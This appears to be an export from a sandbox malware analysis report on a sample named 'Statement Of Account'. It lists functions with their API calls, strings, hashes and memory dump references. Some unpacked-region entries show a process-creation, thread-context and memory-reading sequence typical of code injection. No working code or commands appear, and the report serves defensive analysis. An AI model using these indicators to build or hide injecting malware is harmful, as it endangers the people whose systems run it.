Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C

Function 03E4DFE8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03E4DED8: Sleep.KERNELBASE(000001F4), ref: 03E4DEE9

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03E4E10D

Strings

8LEC2YAMH1ZC8C3G4, xrefs: 03E4E170, 03E4E173

Memory Dump Source

Source File: 00000000.00000002.2061708935.0000000003E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 03E4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e4b000_Statement Of Account.jbxd

Similarity

API ID: CreateFileSleep
String ID: 8LEC2YAMH1ZC8C3G4
API String ID: 2694422964-1670716257
Opcode ID: 84db2c432b95f6306d61ec675d0a6eef5ed8e08b44a87b9da8c0f06c71dd296b
Instruction ID: 020425a7f52e11ba7b0a81fdbce964e13a31e9c74c54a3357e82235e52d3313d
Opcode Fuzzy Hash: 84db2c432b95f6306d61ec675d0a6eef5ed8e08b44a87b9da8c0f06c71dd296b
Instruction Fuzzy Hash: 75519E71D04248EBEF11DBA4D855BEEBB79AF48304F004299E608BB2C1D6B90B05CBA5

Function 00413A88 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00413AA6

Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
Part of subcall function 00418407: RtlEnterCriticalSection.NTDLL(?), ref: 00418431

___sbh_find_block.LIBCMT ref: 00413AB1
___sbh_free_block.LIBCMT ref: 00413AC0
RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C

Function 0040F5E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC

_strcat.LIBCMT ref: 0040F603

Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8

Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8

Strings

HH, xrefs: 0040F5EE

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
String ID: HH
API String ID: 1194219731-2761332787
Opcode ID: ee47fd20779ff5886c3c730aa44a1efa7791f275b5868e90dcef310a8da63108
Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
Opcode Fuzzy Hash: ee47fd20779ff5886c3c730aa44a1efa7791f275b5868e90dcef310a8da63108
Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A

Function 03E4CED8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03E4D693
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03E4D729
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03E4D74B
TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 03E4DA54

Memory Dump Source

Source File: 00000000.00000002.2061708935.0000000003E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 03E4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e4b000_Statement Of Account.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
String ID:
API String ID: 572931308-0
Opcode ID: 5c0c2c366f6ee379bfa73ed3ee6324b9c12a1226fce66c24c6c78c8833906ccb
Instruction ID: 635b7448d6b9206ae1a6e357302f4e8d62506cd060447da3cd9f9e46786a07ad
Opcode Fuzzy Hash: 5c0c2c366f6ee379bfa73ed3ee6324b9c12a1226fce66c24c6c78c8833906ccb
Instruction Fuzzy Hash: 6062FA30A142589BEB24DFA4DC40BDEB376EF58304F1091A9D10DEB391E7759E81CB59

Function 0040E1E0 Relevance: 6.1, APIs: 4, Instructions: 82windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040E202
Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A

Function 0041171A Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00411734

Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A), ref: 00413931

std::bad_alloc::bad_alloc.LIBCMT ref: 00411757

Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC

std::bad_exception::bad_exception.LIBCMT ref: 0041176B
__CxxThrowException@8.LIBCMT ref: 00411779

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C

Function 004734B7 Relevance: 4.7, APIs: 3, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96

Function 0040F110 Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26

Function 0043526E Relevance: 4.5, APIs: 3, Instructions: 26COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00435278

Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A), ref: 00413931

_malloc.LIBCMT ref: 00435288
_malloc.LIBCMT ref: 00435298

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _malloc$AllocateHeap
String ID:
API String ID: 680241177-0
Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC

Function 03E4DF68 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 03E4DFC2

Strings

D, xrefs: 03E4DF7C

Memory Dump Source

Source File: 00000000.00000002.2061708935.0000000003E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 03E4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e4b000_Statement Of Account.jbxd

Similarity

API ID: CreateProcess
String ID: D
API String ID: 963392458-2746444292
Opcode ID: d8032cd0c60c85bdcbdd1e95e32548ef73afa8e82147693fe147fc67f90273c0
Instruction ID: 90d8d1fd63148834c885e6e39990436764febd379c95b0e1bf45c9c13fec85d7
Opcode Fuzzy Hash: d8032cd0c60c85bdcbdd1e95e32548ef73afa8e82147693fe147fc67f90273c0
Instruction Fuzzy Hash: 6401127594030CABDB20DBE0DC59FFE777CBF48701F408659BA16AA180EA7496088B51

Function 00401B70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00401B71

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779

Strings

@EXITCODE, xrefs: 00401B70, 00401BB5

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
String ID: @EXITCODE
API String ID: 580348202-3436989551
Opcode ID: 4145ab2d07bf19a354fff2d5031cf88e997e0915ee9c5273387e54f5573defd1
Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
Opcode Fuzzy Hash: 4145ab2d07bf19a354fff2d5031cf88e997e0915ee9c5273387e54f5573defd1
Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15

Function 03E4CED5 Relevance: 3.4, APIs: 2, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03E4D693
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03E4D729
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03E4D74B
TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 03E4DA54

Memory Dump Source

Source File: 00000000.00000002.2061708935.0000000003E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 03E4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e4b000_Statement Of Account.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
String ID:
API String ID: 572931308-0
Opcode ID: cda9e504f2d45f499d696161523d23a525f419a6d7e2a7c62ebf8d064aefc9a0
Instruction ID: 703d1a46390eff0980cd50a88b2d8ff047641f2b76d72352bfd0816a0bb7d6c8
Opcode Fuzzy Hash: cda9e504f2d45f499d696161523d23a525f419a6d7e2a7c62ebf8d064aefc9a0
Instruction Fuzzy Hash: 8E12F024E14658C6EB24DF64D8507DEB232EF68300F10A1E9910DEB7A5E77A4F81CF5A

Function 0040B380 Relevance: 3.3, APIs: 2, Instructions: 255COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00430AEA

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: eacc0142db4d950baece999cff2e812bbd2e67c8ad5ab65b103d457396c453fe
Instruction ID: 1f11e118333250ff1b1cce483c812f274274124743f71e781b8a547d9d3e43da
Opcode Fuzzy Hash: eacc0142db4d950baece999cff2e812bbd2e67c8ad5ab65b103d457396c453fe
Instruction Fuzzy Hash: 35917E706042009FC714DF55D890A6AB7E5EF89318F14896FF849AB392D738EE41CB9E

Function 0040EFE0 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C

Function 0041511A Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00415147
__lock_file.LIBCMT ref: 00415172

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99

Function 00414E94 Relevance: 3.0, APIs: 2, Instructions: 39COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23

Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6

__lock_file.LIBCMT ref: 00414EE4

Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A

__fclose_nolock.LIBCMT ref: 00414EEE

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 717694121-0
